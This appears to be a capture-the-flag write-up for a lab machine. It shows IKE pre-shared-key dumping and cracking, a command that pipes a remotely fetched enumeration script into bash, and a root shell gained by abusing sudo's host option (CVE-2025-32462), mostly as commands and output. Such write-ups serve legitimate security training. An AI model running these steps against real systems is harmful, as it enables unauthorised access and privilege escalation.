Reconnaissance
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kerne
Since the nmap scan on all TCP ports only found 22 and that is likely not vulnerable, I redo the scanning but this time for UDP. This does find the port 500 commonly associated with IKE.
PORT STATE SERVICE VERSION
500/udp open isakmp?
| ike-version:
| attributes:
| XAUTH
|_ Dead Peer Detection v1.0
Initial Access
Running ike-scan in aggressive mode with --pscrack=ike.psk will dump the pre-shared key (PSK) parameters to ike.psk. Additionally the scan identifies a possible user account and a domain name in the output ike@expressway.htb. I then run ikescan2john to convert the PSK into a crackable hash.
$ ike-scan --pskcrack=ike.psk -A 10.129.19.36
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.19.36 Aggressive Mode Handshake returned HDR=(CKY-R=ed7cd7e6fb28f99c) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)
Ending ike-scan 1.9.6: 1 hosts scanned in 0.033 seconds (30.51 hosts/sec). 1 returned handshake; 0 returned notify
$ cat ike.psk
034fbf932c24233ce73a9bdad<SNIP>
$ ikescan2john ike.psk > hashFeeding the generated hash into john returns the cleartext password freakingrockstarontheroad and allows me to login via SSH as ike.
$ john hash --wordlist=/usr/share/wordlists/rockyou.txt --fork=10
Using default input encoding: UTF-8
Loaded 1 password hash (IKE, PSK [HMAC MD5/SHA1 32/64])
Cost 1 (hash algorithm used for hmac [1:MD5 2:SHA1]) is 2 for all loaded hashes
Node numbers 1-10 of 10 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
freakingrockstarontheroad (?)Privilege Escalation
The user ike does not seem to be able to run any command via sudo, but is part of the unusual group proxy. Searching for files owned by this group returns a few logs from Squid. Overall they don’t seem very interesting but there’s an additional hostname called offramp.expressway.htb in the access logs.
$ id
uid=1001(ike) gid=1001(ike) groups=1001(ike),13(proxy)
$ find / -group proxy 2>/dev/null
/run/squid
/var/spool/squid
/var/spool/squid/netdb.state
/var/log/squid
/var/log/squid/cache.log.2.gz
/var/log/squid/access.log.2.gz
/var/log/squid/cache.log.1
/var/log/squid/access.log.1
$ cat /var/log/squid/access.log.1
--- SNIP ---
1753229688.902 0 192.168.68.50 NONE_NONE/400 3896 GET / - HIER_NONE/- text/html
1753229688.902 0 192.168.68.50 NONE_NONE/000 0 - error:transaction-end-before-headers - HIER_NONE/- -
1753229688.902 0 192.168.68.50 TCP_DENIED/403 3807 GET http://offramp.expressway.htb - HIER_NONE/- text/html
1753229689.010 0 192.168.68.50 NONE_NONE/400 3896 OPTIONS / - HIER_NONE/- text/html
--- SNIP ---Running linpeas.sh shows two sudo binaries on the host at /usr/local/bin/sudo and /usr/bin/sudo. Based on the PATH variable for the user ike, the one in /usr/local/bin is used.
$ curl http://10.10.10.10/linpeas.sh | bash
--- SNIP ---
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid
strace Not Found
-rwsr-xr-x 1 root root 1.5M Aug 14 12:58 /usr/sbin/exim4
-rwsr-xr-x 1 root root 1023K Aug 29 15:18 /usr/local/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 116K Aug 26 22:05 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 75K Sep 9 10:09 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 87K Aug 26 22:05 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 91K Sep 9 10:09 /usr/bin/su
-rwsr-xr-x 1 root root 276K Jun 27 2023 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
--- SNIP ---
$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
They both return different versions when invoked with -V and looking up vulnerabilities in 1.9.17 finds several, among them are CVE-2025-32462 and CVE-2025-32463.
$ /usr/local/bin/sudo -V
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17
$ /usr/bin/sudo -V
Sudo version 1.9.13p3
Sudoers policy plugin version 1.9.13p3
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.13p3
Sudoers audit plugin version 1.9.13p3Based on the description CVE-2025-32462 sounds promising. sudo does have a -h switch to provide a hostname and this should be used in conjunction with --list to print the commands the user could run on the that specific host. When omitting the --list switch, sudo will run the command on the current host, if the user has the needed privileges on the host provided with -h.
Since I already found another hostname in the Squid proxy logs, I try my luck and see that ike can run anything as root on offramp. Then I replace the -l with -s and get a shell as root to read the final flag.
$ sudo -h offramp.expressway.htb -l
Matching Defaults entries for ike on offramp:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User ike may run the following commands on offramp:
(root) NOPASSWD: ALL
$ sudo -h offramp.expressway.htb -s
root@expressway:/home/ike# whoami
rootIt's also possible to use
CVE-2025-32463to escalate privileges on the host. There proof of concepts available on GitHub.
Attack Path
flowchart TD subgraph "Initial Access" A(IKE) -->|Aggressive Scan| B(Pre-Shared Key) B -->|Brute Force| C(Shell as ike) end subgraph "Privilege Escalation" C -->|Read Squid proxy logs| D(Find domain offramp) D -->|CVE-2025-32462| E(Shell as root) end